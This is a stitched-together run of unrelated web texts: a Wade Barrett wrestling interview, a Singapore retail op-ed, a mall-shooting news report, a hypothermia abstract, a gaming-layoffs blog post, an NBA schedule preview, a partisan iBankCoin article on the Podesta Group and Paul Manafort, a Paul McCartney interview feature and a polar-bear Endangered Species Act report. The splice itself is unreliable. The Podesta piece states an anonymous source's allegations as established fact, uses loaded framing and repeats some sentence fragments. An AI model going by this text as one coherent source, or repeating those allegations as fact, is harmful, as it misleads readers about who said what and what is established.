“Kevin Davies is fantastic, what a difference he has made, just that little bit of experience and quality he has got. He's a former England player, and spent most of his career playing at the very top level, so for Preston to even get the chance to sign a guy like that is incredible. You've got to say the manager and the chairman have done an incredible job in setting that up and bringing him in and convincing him to come to North End in the first place, when I know he had a lot of other options in higher divisions than Preston.”
WWE Superstar Wade Barrett with Preston North End commentator Jonathan Breeze
So what else have you been doing during your time back home, have you had the chance to see your family and friends?
“Yeah seeing my family, doing a little bit of this media stuff, fingers crossed getting this Visa sorted soon, which has thrown a bit of a spanner in the works for us. I was supposed to be going on tour to Abu Dhabi but I'm going to get taken off that. The Embassy every year seems to increase their security further and further. The last time I came back it took about two weeks to process and so far it has taken double, it's not really problems, they're just really slow at processing them.”
Is that why we haven't seen so much of you on television? Has it impacted on your appearances for WWE?
“Yeah I was supposed to be back in the States two weeks ago and I think the Night of Champions pay-per-view I was supposed to be away for, but I also missed Battleground. It's very difficult for me to do anything at the moment, being without a passport. Fingers crossed it gets cleared up in the next few days.”
I presume you will be back here though for WWE's UK tour in November, the live recording of Raw and Smackdown in Manchester?
“Yeah I'm definitely going to be on those shows, we've got Manchester I think on the 11th and 12th, our two TV tapings, so I'm very excited to be a part of that. It's always good for me to come back to the North West, with that being my part of the world.
“I know we're trying our best to get the Preston North End first team along for the shows, which would be really cool. I know a few of the lads are fans and they're planning a team night-out or something like that. They need to check their schedules first but I want to give them a good night-out, like they gave me a good day out in Walsall. I can repay the favour now.”
We spoke back in March, just before WrestleMania 29. At the time you were the WWE Intercontinental Champion and we were talking about the possibility of you facing Sheamus on the show. In the end you took on The Miz as part of the pre-show. Were you disappointed not to make the full card, and what's it like being part of the pre-show?
“The pre-show is pretty big, that's kind of viewed as the final chance to get people to buy WrestleMania. Obviously if you perform well on the pre-show, people see it and enjoy it they are more likely then to go ahead and order WrestleMania, which comes right after it. The pre-show they put out free as a little taster to really try and hook people to buy the main show afterwards. So it's seen in the company as a very important spot on the card. That's certainly not a demotion or anything like that in that sense, however, from my point of view I always want to be on WrestleMania, because it's our biggest show of the year.
“Obviously you get a lot of guys coming back from the past, like Chris Jericho, The Rock, Brock Lesnar, Triple H and The Undertaker, so the spots on the card tend to fill up very quickly when you've got guys like that who aren't normally around on the show come back and take spots on the card. For me personally that is very disappointing that I missed out on that, but it just kind of fuels me more to make sure I'm on next year's show.”
Despite that disappointment, I imagine the crowd were very excited about that stage to see the pre-show.
“Yeah exactly. I think that's the biggest crowd I've wrestled in front of. I've wrestled in two WrestleManias now - the one this time I think was an 80,000 crowd in a huge stadium out in the States. So just that experience itself, forgetting about the fact it's WrestleMania and there are cameras there, just going out there and wrestling in front of a packed NFL stadium with 80,000 screaming fans who are all losing their minds is a great experience and something I will never forget.”
You lost the title to The Miz by submission, so maybe it wasn't quite ‘the WrestleMania moment' you were looking for, but the next night on Raw in New Jersey you experienced something very special when you regained the belt.
“Yeah it was pretty cool to get that back so quickly, first of all against a guy like The Miz who is very experienced and a good performer. But the crowd that night were very unique and I think one of the cool things about the crowd is because so many Brits come over to watch WrestleMania, a lot of them stay the next night and watch the Raw TV show too.
“Basically you went from an 80,000 crowd with maybe 10 per cent of it being Brits, to the next night we're in a 15,000 crowd in a smaller area, but probably half the crowd were British, so I was kind of the popular guy that night and everyone was cheering for me, which is pretty unique in the States where I'm normally booed.
“It's always great for me to wrestle in front of those UK audiences and I love them, whether they're out in the States following us around or back here in the UK on the forthcoming tour. It's always a huge highlight for me getting to wrestle in front of them.”
I have to say I've never seen an episode of Raw like it, it was absolutely crazy from start to finish. There were even chants of ‘Wade Barrett's barmy army'.
“Yeah I think for the first time the star of the show was actually the crowd that day, they were fantastic. It was like an English football crowd!”
In the month after that you feuded with The Miz, and at the time the immensely popular Fandango, who was riding a wave after WrestleMania. You were building to a triple threat match at the PayBack pay-per-view, but then Fandango suffered a serious injury, a concussion, which meant he couldn't compete at the event. He was replaced by Curtis Axel, who won the title from you. It was an innovative finish, as The Miz had you in a figure-four leglock, and Axel pinned your shoulders, but were you disappointed your Intercontinental Title reign was so short-lived?
“I was disappointed in a way, it's always disappointing to lose a match and lose your title, however, that was the third time I had held the Intercontinental Championship, and for me the big one I'm after is definitely the World Heavyweight Championship. As far as I was concerned you know I had lost that title and that was a disappointment, but to me I've always had bigger plans and bigger goals anyway, so that in my opinion was the opportunity to kind of move away from that area of the show, and try and move back towards a main event spot in the WWE.”
You did exactly that, as in July we saw you take part in the Money In The Bank ladder match for the World Heavyweight Championship. That was a stunning match I thought, and probably for my money the best match of the night. I know a lot of people said it really stole the show, even though it was the opening bout. Did you enjoy that?
“Yeah it was really cool. I think a lot of people make the mistake of thinking Money In The Bank ladder matches are all about the stunts, whereas while that is a huge part of it and obviously we put some of that in there, but for me wrestling is all about storylines. Whether it's the scripted acting we do, or the stuff you see in the ring, you can tell stories drive the match.
“I think in terms of Money In The Bank ladder matches, if you look through history, the story that the group of us told in that match this year, was probably the best that's ever been told in one of those matches. We told the story of two friends, Cody Rhodes and Damian Sandow, and a betrayal. If you watch that match I think there was a great storyline even looking past all the stunts and I think that's what made that match so successful, the eight of us working together and making that storyline work. It's always great to come to the locker room afterwards when everyone was patting us on the back and telling us how good it was, and obviously hearing the crowd reaction, it's great for us as performers that we came up with this plan and goal and it paid off and worked.”
I've been watching wrestling for a lot longer than it's probably reasonable for a 31-year-old man to admit...
“You and me both!”
...but the ending of that match threw me. I love it when it catches you by surprise, and I must admit, I had totally forgotten about Sandow as Cody was climbing the ladder.
“I think the longer you watch wrestling the harder it is to impress you as a fan. I see that myself, I can get a little jaded watching it sometimes because I can see three or four steps ahead, obviously with me being involved in the industry even more strongly for me I see those things, but it's always great when we manage to do something that kind of tricks and swerves everybody, especially the guys who have been watching for years and years and kind of know how things work. So it's great when we can pull that off and that usually results in some pretty good programming.”
After Money In The Bank we briefly saw you feud with Daniel Bryan, your old NXT adversary, and he shaved your beard off on Raw. Are you happy with your new look?
“It was a new look for about three weeks, then it all grew back. It's back in business! It's actually the longest it's ever been now, I kind of made a rule that when I came back to the UK I wasn't going to shave it until I got back to the States, and I wasn't quite expecting to be back this long. It's getting pretty long, I'm slowly catching Daniel Bryan's beard up at this point! Before I get back on TV I think I'll have to trim it down a little.
“I didn't like it at all, it made me look about 10 years younger, which I think a lot of people like, but when you're meant to be a big scary wrestler it doesn't work to well!”
After that segment you had another impressive match with Daniel Bryan on Smackdown. Do you enjoy facing him and what do you make of his rapid rise this summer and boom in popularity?
“Well I've been with Daniel Bryan from the start, we both started off on the NXT show together and we've always got along pretty well outside of the ring.
“Obviously I've got a lot of respect for his abilities in the ring, he's a very unique character and being a smaller guy it can sometimes be tougher for a lot of people to get involved in WWE, but he's certainly doing great, he's got a very unique set of skills in the ring and I think he connects with a lot of the audience just by looking different - his underdog look, people want to pull for him. He's done great and certainly it's always good to step in the ring with a guy like that.
“I like to vary my opponents. I love facing different sizes and shapes, Big Show is somebody I enjoy getting in the ring with, he's seven foot tall and 500 pounds, Daniel Bryan is on the opposite end of that scale being one of the smaller guys. For me I just like getting in with the best guys out there, guys like that who are going to test me and help me improve and bring out the best in me. It's a pleasure to step in the ring with him.”
We've seen a lot of changes to your character, your music and your look over the last 18 months - do you think you have settled on a direction now, or can we expect more changes before the year is out?
“I think I'm always looking to change and develop and I think you've got to do that just to keep fans interested, because they can kind of get pretty bored of the same thing over and over again. There's not many people who can really get away with not evolving and changing and giving different things constantly.
“A lot of it comes from our creative staff and our writers and what they're needing at the time, they might have a specific need for a certain type of character they want me to fill, and that's why I might have to take a slightly different creative direction from what I'm doing at the moment. But for me I'm always looking to evolve and change and keep things fresh, so we'll just have to see where that goes.”
The WWE Live tour visits Manchester Arena on November 11 and 12. Tickets can be purchased at www.theticketfactory.com or by calling 0844 338 8000.
The development of culture often has a powerful influence on a country's retail industry.
Anime and manga culture has spawned numerous unique products, such as character models, cafes and cosplay, that have made Japan a sought-after retail destination.
South Korea has arguably become a fashion powerhouse due to the industry's close links with Hallyu, or the Korean wave.
Singapore, however, has long taken a pragmatic view to economic development, prioritising "hard" industries over socio-cultural development.
Retail here has largely been driven by the importing of a wide range of renowned international brands.
However, these brands also have a strong presence in other regional markets.
Entertainment and culture should not be dismissed as self-indulgent, but rather, be seen as a potential driver of economic growth.
Singapore lacks unique cultural offerings of its own. This, coupled with high consumer prices, has made the city less appealing to overseas retail consumers and it has begun to lose out in the retail sector.
If Singapore wishes to maintain its competitiveness as a retail hub, it must challenge the assumption that "poetry is not a luxury we can afford".
It should explore means of developing unique and lucrative cultural pursuits designed to appeal to an international market.
Entertainment and culture should not be dismissed as self-indulgent, but rather, be seen as a potential driver of economic growth in the light of increasing media power and a rising consumerist middle class in Asia.
The Government can destigmatise cultural pursuits by investing more in cultural projects and education, as well as opening more cultural space for budding talent.
Nurturing and marketing talented professionals will make it more likely for creative ideas from cultural practitioners to be explored and realised.
Greater cultural vibrancy and retail development arising from such development can hopefully attract more tourists and shoppers to Singapore, and enable it to continue growing as a retail hub amid regional competition.
Ng Qi Siang
As shoppers made last-minute stops before Christmas at the Towson Town Center Monday night, a body lay under a sheet outside Nordstrom.
A man was fatally shot about 6:22 p.m. on a parking lot sidewalk outside a service entrance to the department store, Baltimore County police said. Police said Monday night they had no suspects, and did not release the identity of the victim, described only as a black man.
With six days until Christmas, shoppers appeared unaware of the incident. All the entry doors remained open. Holiday shopping continued as usual.
Police closed off some of the exits from the mall. Officers trained to identify suspicious behavior canvassed the building, police spokeswoman Elise Armacost said.
"It's the height of the shopping season," Armacost said. "We are very concerned about safety."
It's not the first time the Towson Town Center has seen a fatal shooting.
In February 2005, William Bassett, 58, a popular St. Paul's School science teacher and dean, was killed during a botched robbery, found fatally shot on the fifth floor of a parking garage at the mall.
That killing prompted a Baltimore County law requiring shopping centers with 15 or more retail businesses to install security cameras. The mall also upgraded lighting in the parking lot and added security officers.
Armacost declined to comment on whether police had surveillance footage of the shooting.
On Monday night, police blocked vehicle access to several mall entrances. However, cars were able to enter and exit the mall via Dulaney Valley Road, where traffic was jammed.
Later in the evening, police appeared to escort a woman to the crime scene. When she saw the body, she burst into wails audible several hundred feet away.
All officers from the Towson precinct were called in to work the case, said Armacost, who declined to say how many spent shell casings were found on the sidewalk.
She also would not say whether anyone was questioned.
Last month, two people from Prince George's County were fatally shot in the parking lot of Arundel Mills mall. When the suspect walked out of his home in District Heights and shot a police officer, Prince George's County police fatally shot him.
In March, a female employee at Macy's in Marley Station in Glen Burnie suffered debilitating injuries when she was carjacked in the mall parking lot after she left work.
On Monday, the Towson Town Center was mostly empty by 9 p.m., but some shoppers remained.
Fred Hiser, 53, of Towson, said he saw police at the entrances to the garages when he was coming into the mall.
"The most unfortunate thing is that someone lost their lives, probably over something absolutely ridiculous," he said. "It's the second time it's happened here."
Brittany Thomas, 24, of Baltimore, said she was surprised about the shooting, but "I don't feel unsafe right now."
"I'm actually surprised the mall is still open, considering someone got shot outside," she said.
Baltimore Sun reporters Jacques Kelly and Andrea F. Siegel and Jon Meoli of Patuxent Publishing contributed to this article.
alison.knezevich@baltsun.com
Abstract
The phenomenon called paradoxical undressing has been described from 33 cases of hypothermia collected from Swedish police reports. The cases were almost evenly distributed with regard to sex, age, and geographical distribution. The cases occurred more frequently in open land although cases from town areas were also found. Most incidents were recorded from November to February at low ambient temperatures, although cases were also reported at temperatures above 0 degree C. Arteriosclerosis and chronic alcoholism were important concomitant illnesses, the latter being frequent in middle-aged men. Epilepsy, diabetes, and pregnancy were present in single cases. Ethanol and other drugs were present in 67% of the males and in 78% of the females, ethanol predominating in men and various psychotropic agents in women. The mean blood ethanol concentration in males was 0.16% and in females, 0.18%. Most frequent findings at necropsy were purple spots or discoloration on the extremities, pulmonary edema, and gastric hemorrhages. It is concluded that paradoxical undressing might be explained by changes in peripheral vasoconstriction in the deeply hypothermic person. It represents the last effort of the victim and is followed almost immediately by unconsciousness and death.
Well, damn. I wondered why my article on Wizards layoffs in August was suddenly getting hits, and it's because there are more – a lot more. Lisa Stevens of Paizo confirms on ENWorld that the layoffs include:
Randy Buehler (VP of digital gaming)
Andrew Finch (director of digital games)
Stacy Longstreet (senior art director)
Julia Martin (editor)
William Meyers (creative manager, digital design)
Dave Noonan (game designer)
Jennifer Paige (online community manager) (aka Solice)
Jennifer Powers (marketing)
Jonathan Tweet (game designer)
Shockingly big names! And it sucks that it's right before the holidays, but that's all trying to make your year-end numbers look good.
So what does this mean for WotC strategy? They just cut a lot of their digital guys. Are they giving up? Or just taking a huge setback? Cutting down on 4e'ers isn't unexpected – people are saying it's not performing to expectation and heck, they cut people after the 3e launch too.
My personal favorite here is Tweet – IMO, too talented to be working on D&D, though I'm sure a regular paycheck and health benefits were saying otherwise. Time for a new version of Over the Edge or Unknown Armies!!! I'd love to see Tweet land with Pelgrane, Paizo, or even Hidden City Games if they are going to do more RPGs than just Donut or whatnot. He did a lot with Atlas but they've about given up on RPGs. Heck, apparently Mongoose is growing like crazy…
Anyway, best of luck to all the newly jobless.
Advertisements
Note: The contents of this page have not been reviewed or endorsed by the Orlando Magic. All opinions expressed by John Denton are solely his own and do not reflect the opinions of the Orlando Magic or their Basketball Operations staff, partners or sponsors.
By John Denton
Feb. 6, 2016
ORLANDO – If an Orlando Magic team that has been slumping the past six weeks is looking for a break from the NBA's schedule-makers the rest of the way, they aren't going to like this statistic:
Of their remaining 33 games, 20 are against teams with winning records. That's tied for the most games against plus-.500 teams in the NBA along with the Portland Trail Blazers.
Starting with Sunday's 1 p.m. matinee against the Atlanta Hawks, the Magic's remaining opponents have a .510 winning percentage, which is the second-toughest in the Eastern Conference behind only the Hawks. Coincidentally, the Magic (21-28) and Hawks (30-22) will be playing a rare home-and-home back-to-back in Orlando on Sunday (1 p.m.) and in Atlanta on Monday (8 p.m.).
Orlando still has 13 games remaining against the top eight teams in the Eastern Conference: Cleveland (one), Toronto (one), Atlanta (two), Boston (one), Miami (three), Chicago (two), Detroit (two) and Indiana (two). Against the West's top eight, the Magic still have six games to play: Golden State (two), San Antonio (one), Memphis (one) and Dallas (two).
``We have to come play because those aren't the kind of teams that you will play down to the competition and do well,'' said Magic forward Tobias Harris, who expects to play on Sunday despite need seven stitches to close a gash above his left eye. ``They're all top teams for a reason. They execute their stuff and they run their stuff good and we have to be really sharp and on our game for all these games coming up. We've already seen it in the games with San Antonio and OKC. For us to be at that level we have to play at that level also.''
The Magic have lost three in a row since beating the Celtics last Sunday at the Amway Center. Those three losses have come against the second-best (San Antonio), third-best (Oklahoma City) and fourth-best (L.A. Clippers) from the Western Conference. Orlando lost in frustrating fashion on Monday and Wednesday, losing fourth-quarter leads against the Spurs and Thunder. On Friday, Orlando fell behind early following a slow start on both ends of the floor and they were never able the Clippers in a 107-93 defeat.
That loss was the Magic's 15th in the past 17 games, something that is still shocking to the team considering that it was once 19-13 and up to as high as fourth in the Eastern Conference standings. But a large regression on the defensive end of the floor and a team-wide slump on offense has put Orlando back in hard times.
``Right now it's just about finding a way to get out of this because none of us are happy with where we are,'' said center Nikola Vucevic, who struggled through a poor shooting night on Friday and expressed his frustrations in a variety of ways by smacking the basket stanchion and barking at the officials. ``We've played with better energy lately against some of these really good teams, but we're still not there yet. So we've got to keep working.''
The Hawks will make the Magic work what with their patient, disciplined style of offense. They have used their balanced offense and crisp ball movement to beat Orlando twice this season and in 17 of the past 20 meetings. That style will test the Magic's ability to be patient and disciplined defensively.
``They make you be very sharp. (Jeff) Teague and (Dennis) Schroeder are good with the ball out front, but (Kyle) Korver is running off screens, they're a good dribble hand-off team, both bigs can shoot and drive and know have to know who the shooters are who is in the game with them at all times,'' Magic coach Scott Skiles said. ``That's another team that's not afraid to go side-to-side and side-to-side and take the clock under 10 because they have some bail-out guys who can bail them out. And they're going to work every possession and try to make you break down. And if you break down, they're going to score.''
This season, the Magic are 12-10 against teams with sub-.500 records, meaning they have at least progressed to the point that they are beating many of the teams that they are supposed to be. However, Orlando is just 9-17 against teams with winning records. The Magic's most impressive victories against elite teams have come against Toronto, Boston (twice) and Houston.
Magic guard Victor Oladipo had one of the best games of his career on Wednesday against Oklahoma City, making 13 of 19 shots for 37 points. However, he struggled on both ends of the floor on Friday against the Clippers. Oladipo likes that the Magic have plenty of games remaining against several elite teams because it will require that Orlando play at a high level.
``Oh yeah, I look forward to these kinds of games and I look forward to the competition that we're going to have the rest of the year,'' Oladipo said. ``It allows you to see where you are both individually and as a team. … It would be huge for us to beat one of these teams. It's not going to be easy, but we've just got to find a way to do it.''
Former Podesta Group Executive Says Firm Peddled Russian Oligarchs All Over DC With Paul Manafort [VIDEO]
Tucker Carlson gave an explosive monologue last night after a former executive of the Podesta Group contacted the Fox host with “direct personal knowledge” of a report that former FBI director Robert Mueller's Special Counsel is investigating the Washington Lobbying firm founded by John and Tony Podesta.
The former executive who has been “extensively” interviewed by Mueller's team, said the FBI probe is now focusing on people in Washington who have worked as de-facto operatives on behalf of Russian government and business. To that end, Carlson's source made several shocking claims about Paul Manafort and the Podesta Group peddling Russian influence throughout Washington D.C. – focusing primarily on access to the Obama administration, and heavily involved with the Clinton Foundation and the Uranium One deal.
“They are more focused on facilitators of Russian influence in this country than they are on election collusion,” Carlson's source told Fox.
To be clear, a former long-time executive of the Podesta Group has told Robert Mueller's team the following (and more):
Details:
Lobbyist and temporary Trump campaign manager Paul Manafort is at the center of the Russia probe – however the scope of the investigation has broadened to include his activities prior to the 2016 election.
Manafort worked with the Podesta Group since at least 2011 on behalf of Russian interests , and was at the Podesta Group offices “all the time, at least once a month,” peddling Russian influence through a shell group called the European Centre for a Modern Ukraine (ECMU).
, and was at the Podesta Group offices “all the time, at least once a month,” peddling Russian influence through a shell group called the European Centre for a Modern Ukraine (ECMU). Manafort brought a “parade” of Russian oligarchs to congress for meetings with members and their staffs, however, the Russia's “central effort” was the Obama Administration.
In 2013, John Podesta recommended that Tony hire David Adams, Hillary Clinton's chief adviser at the State Department, giving them a “direct liaison” between the group's Russian clients and Hillary Clinton's State Department.
In late 2013 or early 2014, Tony Podesta and a representative for the Clinton Foundation met to discuss how to help Uranium One – the Russian owned company that controls 20 percent of American Uranium Production – and whose board members gave over $100 million to the Clinton Foundation.
– the Russian owned company that controls 20 percent of American Uranium Production – and whose board members gave over $100 million to the Clinton Foundation. “ Tony Podesta was basically part of the Clinton Foundation.”
Believing she would win the 2016 election, Russia considered the Podesta Group's connection to Hillary highly valuable .
. Podesta Group is a nebulous organization with no board oversight and all financial decisions made by Tony Podesta. Carlson's source said payments and kickbacks could be hard for investigators to trace, describing it as a “highly secret treasure trove.” One employee's only official job was to manage Tony Podesta's art collection, which could be used to conceal financial transactions.
Former Podesta Group Exec: Paul Manafort was in PG offices "all the time" representing Russian political and business interests. #RussiaGate pic.twitter.com/6dFB1MJRdP — ZeroPointNow (@ZeroPointNow) October 25, 2017
"Tony Podesta was basically part of the Clinton Foundation," Podesta Group may be concealing financial transactions through art collection. pic.twitter.com/yyyo57THMJ — ZeroPointNow (@ZeroPointNow) October 25, 2017
See the entire monologue below:
While many aspects of Manafort's Russian ties are still unclear, one has to wonder how he became Donald Trump's campaign manager, and why he was suddenly fired from the position after less than three months on the job – two months before the election. Was Manafort pitched to Trump to leverage his vast DC connections, only to be fired after the scope of his involvement with Russia was revealed? Or was Manafort ejected when the left began the Russian witch hunt?
As iBankCoin previously reported, the Podesta Group was subpoenaed in late August along with four other public relations firms who worked with former Trump campaign manager Paul Manafort during a 2012-2014 lobbying effort for a pro-Ukraine think tank – the European Centre for a Modern Ukraine (ECMU) – tied to former Ukrainian president Viktor Yanukovych.
Yanukovych fled from Ukraine to Russia after he was unseated in a 2014 coup.
Two of the subpoenaed firms include Paul Manafort's Mercury, LLC and the Podesta Group.
White House Access
Visitor logs reveal that Tony Podesta visited the White House at least 114 times during the Obama administration, and was said to have had ‘special access‘ to the administration through his brother, John Podesta, while lobbying for various pro-Kremlin interests.
During a 2015 interview with CNN's Fareed Zakaria, former president Obama admitted that his administration ‘brokered a deal‘ for the 2014 coup in Ukraine – all while John Podesta was a West Wing advisor and Tony Podesta lobbied for an organization which opposed the coup.
Uranium One and Joule Unlimited
The Podesta group earned $180,000 lobbying for Russian-owned mining company Uranium One during the same period that the Clinton Foundation was receiving millions from UrAsia / U1 interests.
Last week, two bombshell reports published by The Hill revealed that the FBI – headed by Robert Mueller at the time – discovered that “Russian nuclear officials had routed millions of dollars to the U.S. designed to benefit former President Bill Clinton's charitable foundation during the time Secretary of State Hillary Clinton served on a government body that provided a favorable decision to Moscow” – a deal which would grant the Kremlin control over 20 percent of America's uranium supply, as detailed by author Peter Schweitzer's book Clinton Cash and the New York Times in 2015.
So – after Russia took control of the Uranium, the Podesta Group received $180,000 to lobby for Uranium One during the same period that the Clinton Foundation was receiving millions from U1 interests, and after Russia took majority ownership in the “20 percent” deal (source – you have to add up the years).
And now, a former Podesta Group executive tells the world that the real Russian collusion story starts with Paul Manafort and the Podesta Group and ends with Hillary Clinton and the Obama Administration.
If you enjoy the content at iBankCoin, please follow us on Twitter
Interviewing your heroes can have its pitfalls, but Paul McCartney avoids them all
Updated
One of the questions I'm most often asked is, "If you could interview anybody in the world, who would you pick?"
It's a difficult question.
When somebody asks it, they imagine that it must be a thrill to meet somebody of whom you are a huge fan.
It is, of course, but it also comes with fear.
What if the person is horrible? What if it's a bad experience?
What if every time you then hear one of their songs, or read one of their books or watch one of their films, it's then a little bit soured by the fact you met them and they were mean or ill-mannered or egotistical?
This happened to me when I interviewed the American author Jonathan Franzen in 2010 about his book, Freedom.
I found him difficult from the first question.
Now every time I consider re-reading The Corrections, one of my favourite books, all I think about is how snippy Jonathan Franzen was.
What if McCartney is a Franzen?
Sorry, this video has expired Video: Paul McCartney rehearsing Day Tripper before his Perth concert (ABC News)
If the question is really, "Of whom are you the most massive fan?", the answer is former Beatle, Paul McCartney.
But do I want to interview him? His work means so much to me, do I really want to risk discovering that he's a Franzen?
This week, I was forced to answer that question. My producer Callum rang me with a mind-blowing offer: McCartney will do his only television interview in Australia with you if you want to do it.
When the offer came, it turned out it really wasn't a dilemma at all. It was a risk that simply had to be taken.
As if any journalist could say no to the offer of an interview with one of the most influential musicians of the past century.
I desperately hoped he would be a lovely person but I also said to myself, "He's achieved so much musically, if he turns out to be awful, and that's the price of being the genius that is Paul McCartney, that's okay, I'm not going to let it affect how I feel about his music."
On the day of the interview, I arrived in Perth — the first stop on his Australian tour — five hours before we were scheduled to head to the stadium.
"You've got plenty of time to have some lunch and then lie down and have a rest," I told myself.
I ate two bites of a sandwich before I couldn't stomach another mouthful and then I spent the two hours before my make-up artist arrived pacing around my hotel room in nervous anticipation, periodically grinning like a lunatic and hugging myself with glee.
I'm going to meet Paul McCartney! I'm going to watch his rehearsal from backstage!
'Why don't you play it?'
As soon as we arrived at the stadium, we met his team (including his right-hand man Stu, who caused the entire ABC crew to audibly gasp when he mentioned that before McCartney, he had been with David Bowie).
In a good sign, everyone we met was warm and friendly. Usually if a team is polite and accommodating, the person at the top is likely to be the same.
McCartney's stage manager, Keith, showed me the collection of guitars with which McCartney tours. ("This is the one he played on the Ed Sullivan show; This is the one they used on Please Please Me").
Then I met his piano technician, who was sitting at the replica Magical Mystery Tour piano (the original is in Sir Paul's house, he told me, but this is the one they've used on tour for 30 years).
"Can I touch it?" I asked him.
"Sure," he said.
I reached over and tentatively played a C chord.
"Remembering your old music lessons?" he asked.
"I can play a little bit," I replied.
"Why don't you play it?" he said, sliding off the piano stool and gesturing that I should take his place.
"No way," I replied, "I can't!" "Yes, you can, have a play," he said.
So I slid onto the stool and played the opening chords of For No One from the album Revolver.
The piano technician smiled; I think because it was obvious then that I was truly a fan, not just somebody goes through the motions for an interview.
I played about four bars before I lost it and couldn't play another note correctly, my hands were shaking so hard. This is the piano Paul McCartney plays, I was thinking!
We then went around backstage and Sir Paul arrived to start rehearsals.
I stood in the wings watching as he and the band played Another Girl and then Day Tripper.
When the opening riff for Day Tripper started, I looked at my producer, Callum, and said, "Oh my god," with tears in my eyes.
It was absolutely thrilling to stand in the wings and watch Paul McCartney practise that.
'Oh, luv, give us a kiss'
The band finished rehearsing and as I chatted to the crew, I turned around and Sir Paul was about a metre away, walking towards us.
He came and introduced himself and shook everybody's hand.
For almost 60 years, he's had starstruck people standing in front of him, so he's very adept at putting everyone at ease and being warm and charming.
We went on stage and did our interview together.
He was delightful and interesting. He has lovely kind eyes and a gentle way of speaking. I was so happy to see that I was going to walk away with my admiration of him enhanced.
"Sir Paul," I said at the end of the interview.
"I've been very fortunate in my career that I've had the chance to interview world leaders, like Aung San Syu Kii and the Dalai Lama, every celebrity you can think of, Elton John, Patti Smith, but I've never interviewed somebody of whom I'm a bigger fan than you.
"Thank you for all those songs and thank you so much for making time to let us come and talk to you."
"Oh, luv, give us a kiss, come on" he replied and he kissed me on the cheek and gave me a hug.
Every time I listen to a Beatles song now, I'll remember the incredible experience of getting to meet Sir Paul in person and what a beautiful soul he was.
It was one of the greatest experiences of my life.
Topics: arts-and-entertainment, music, pop, perth-6000, australia
First posted
Looking for news you can trust?
Subscribe to our free newsletters.
In late January, Jim Sims, the president and CEO of the Western Business Roundtable, an industry trade group that represents mining and energy interests, told his colleagues to prepare for the worst: The polar bear was almost certain to receive “threatened” status under the Endangered Species Act. “The negative implications of this to business and industry [are] breathtaking,” he wrote in an email, obtained by Mother Jones. But, he said, his and other groups had devised a plan to fight and “quite possibly reverse” the imminent ruling. Part of that strategy involved a legal challenge to the listing. On that score, Sims promised they had “secured a truly extraordinary plaintiff for this effort: one of America's most prominent civil rights leaders of the four past decades.”
That prominent plaintiff was Roy Innis, the longtime chairman of the Congress of Racial Equality. A civil rights group that dates back to the 1940s, CORE's agenda has taken a distinct rightward tilt under Innis' leadership, aligning itself with conservative activists opposed to the environmental movement. Speaking in March at a conference of global warming skeptics sponsored by the Chicago-based Heartland Institute, which has received more than $600,000 in funding from ExxonMobil since the late '90s, Innis announced that his organization, itself a recipient of Exxon funding, would sue the Bush administration if the polar bear were listed. He cast the issue as one of economic justice, if not civil rights, saying that the pending ruling would “result in higher energy prices across the board which will disproportionately be borne by minorities,” causing “countless families in our country in winters ahead to choose between food on the table and fuel in the furnace.”
Should the polar bear receive ESA protection in a decision expected by early next week, legal challenges, full-press lobbying, and media campaigns designed to portray the listing as a devastating financial blow to a country already in economic turmoil are just the tip of the proverbial iceberg. “You're going to start seeing lawsuits like dandelions in a field the day after the regulations are filed,” Sims told me. Innis says, “I will join anyone who wants to fight this thing. There is nothing that's impacting us more than $4 gasoline. It's going to impact so heavily minorities and poor people. This should be the major talking point in the presidential campaign.”
Since 2005, when the Arizona-based Center for Biological Diversity petitioned the Fish and Wildlife Service to list the polar bear as a threatened species, a broad coalition of industry and conservative groups have watched, with increasing dread, as the petition slowly worked its way through the Interior Department, helped along by lawsuits filed by environmental groups. Almost since the ink dried on the ESA more than thirty years ago, conservatives have bridled at its strictures, viewing the law as an affront to free-market principles and an impediment to businesses seeking to develop land or extract natural resources. But, even in this context, the polar bear's possible ESA listing has elevated the debate to a fever pitch. “Compared to this decision, the Spotted Owl and Snail Darter cases were pimples on an elephant,” Chuck Cushman, the founder of the American Land Rights Association, told recipients of his email list this winter in an “all out call to action” that implored supporters to “deluge the White House and Interior Department with calls, faxes and emails.” By this he meant that, unlike typical ESA listings, protections for the polar bear could extend well beyond its natural habitat in the US, along the Beaufort and Chukchi seas of northern and western Alaska. Based on scientific studies showing that global warming is rapidly deteriorating the Arctic sea ice that polar bears call home, the CBD's endangered species petition was among the first to tie greenhouse gas emissions to the fate of a species.
It was no accident. If the petition succeeds, it could prompt a wholesale shift in federal climate-change policy, potentially forcing a wide array of industries nationwide, and the energy sector in particular, into compliance with the ESA. Under this scenario, says Kassie Siegel, the CBD attorney who coauthored the organization's polar bear petition, “If you have an action that's going to lead to a major amount of greenhouse gas emissions, you also need to consider the cumulative impact of those emissions on polar bears and look at ways to reduce those emissions.”
Cushman, who says he is not opposed to protecting the polar bear or even reducing greenhouse gases, told me he believes that bringing emissions under the purview of the ESA could result in turning small industrial enclaves into ghost towns. “We have to keep in mind that people are an important species too,” he says. “Instead of a radical regulatory regime, we have to have a moderate, gradual swing.”
But to environmental activists like Siegel, the time for swift action is now. “Behavior needs to change,” she says. “And litigation changes behavior. It's a good thing if we have fewer coal-fired power plants and less offshore oil and gas development. To say that it's going to shut down the economy, that's just incorrect. It's mumbo jumbo.”
The Bush administration has kept the polar bear petition in limbo for more than three years and, overall, has resisted taking steps to address global warming—even going so far as to suppress climate-change research and other studies by government scientists deemed out of step with the White House's agenda. Among the officials discovered to be playing politics with science was Julie MacDonald, a former deputy assistant secretary at the Interior Department, and, for five years, the person in charge of overseeing the Fish and Wildlife Service's ESA program. Last March, an investigation of MacDonald by the Interior Department's inspector general reported that she had “been heavily involved with editing, commenting on, and reshaping the endangered species program's scientific reports from the field,” despite her lack of a “formal educational background in natural sciences.” Though she resigned last May, amidst news that she had passed internal agency documents to industry lobbyists, the pace of the listing process did not pick up. In January, the Fish and Wildlife Service missed its deadline for issuing a decision, while the Interior Department's Minerals Management Service almost simultaneously announced plans to auction off oil- and gas-exploration leases in the Chukchi Sea, the very heart of polar bear country. This move was seen as no accident by environmentalists, and was sharply criticized by Barbara Boxer, the chair of the Senate's environment and public works committee.
At this point, however, the administration has put off the ruling as long as it can. Last week a federal judge ordered the Interior Department to weigh in on the polar bear petition once and for all by May 15, leaving conservative opponents to the ESA listing bracing for the worst—and strategizing their counterattack.
